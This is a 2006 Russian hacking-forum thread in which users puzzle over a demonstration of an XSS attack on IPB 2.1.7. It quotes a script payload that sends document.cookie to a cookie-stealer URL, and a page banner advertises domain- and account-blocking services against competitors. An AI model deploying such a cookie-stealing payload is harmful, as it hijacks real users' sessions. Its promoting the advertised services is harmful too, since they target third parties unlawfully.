Форум АНТИЧАТ - xss без документ.куи?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Оффтоп > Болталка
xss без документ.куи?

Опции темы

Поиск в этой теме

Опции просмотра

xss без документ.куи?

04.10.2006, 07:43

~~gemaglabin~~

Banned

Регистрация: 01.08.2006

Сообщений: 725

Провел на форуме:
7681825

Репутация: 4451

xss без документ.куи?

Недавно на одном из зарубежных порталов скачал видео по демонстрации xss на ipb 2.1.7

Код темы форума хекера был такой

Код:

[урлl=http://путь к гиф файлу][имг]просто картинка][/имг]

Gif файл

Код:

<SCRIPT>location.href='http://127.0.0.1/cookiestealer.php?cookie='+escape(document.cookie)</SCRIPT>

После обращения к линку у хекеря в логах осталась его сессия.Как такое возможно,если в линке в теме топика не передается документ.куки а те куки что уже в гиф файле будут куки не с форума?

Попробовал на локалхосте,естествено,нуле вой результат

)

Кому интересно могу даю линк на видео,но в отличие от нас,у них размеры видео начиная с 30 мегов и выше

http://rapidshare.de/files/33563512/Video_4_Hacking-Truths.NeT.rar.html

Ну ведь бред да?

04.10.2006, 09:03

hidden

Постоянный

Регистрация: 23.04.2006

Сообщений: 622

Провел на форуме:
5887054

Репутация: 1292

Ты серьёзно или это прикол?
Если серьёзно, тогда сколькие из них повелись на это?
Ещё-бы куки не записались, стилер с форумом и картинкой на одном хосте(127.0.0.1).

04.10.2006, 13:20

~~gemaglabin~~

Banned

Регистрация: 01.08.2006

Сообщений: 725

Провел на форуме:
7681825

Репутация: 4451

hidden это был как пример дан.его кукистилер и форум были на разных хостах.

04.10.2006, 16:14

~~ZaCo~~

Banned

Регистрация: 20.06.2005

Сообщений: 880

Провел на форуме:
4610226

Репутация: 1332

2gemaglabin у куксов есть необходимое для этого поле - хост)

04.10.2006, 18:25

Pochka

Познающий

Регистрация: 26.11.2005

Сообщений: 32

Провел на форуме:
47872

Репутация: 20

хыхыхыхых, эх гема-Гема =)

04.10.2006, 18:28

~~gemaglabin~~

Banned

Регистрация: 01.08.2006

Сообщений: 725

Провел на форуме:
7681825

Репутация: 4451

Я перепутал,gifка лежала на сервере с форумом.Какой тогда смысл?

closed

04.10.2006, 23:32

~~Xex~~

Banned

Регистрация: 10.07.2005

Сообщений: 224

Провел на форуме:
1062041

Репутация: 50

[урлl=http://путь к гиф файлу][имг]просто картинка][/имг]
тут тег урл не закрыт,
может на основе "перекрытия" тегов че было, а в гифке код скорее всего куда нить подключается, либо это чейто шутка...посмотри видео еще раз внимательно,
30метров качать не тема

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
IE XSS Kit	.Slip	Чаты	22	23.10.2006 06:45
XSS worms	Xex	Статьи	0	02.10.2006 01:49
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25
Можно ли провести Xss без знака = ?	F_taker	Уязвимости	2	22.04.2006 13:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход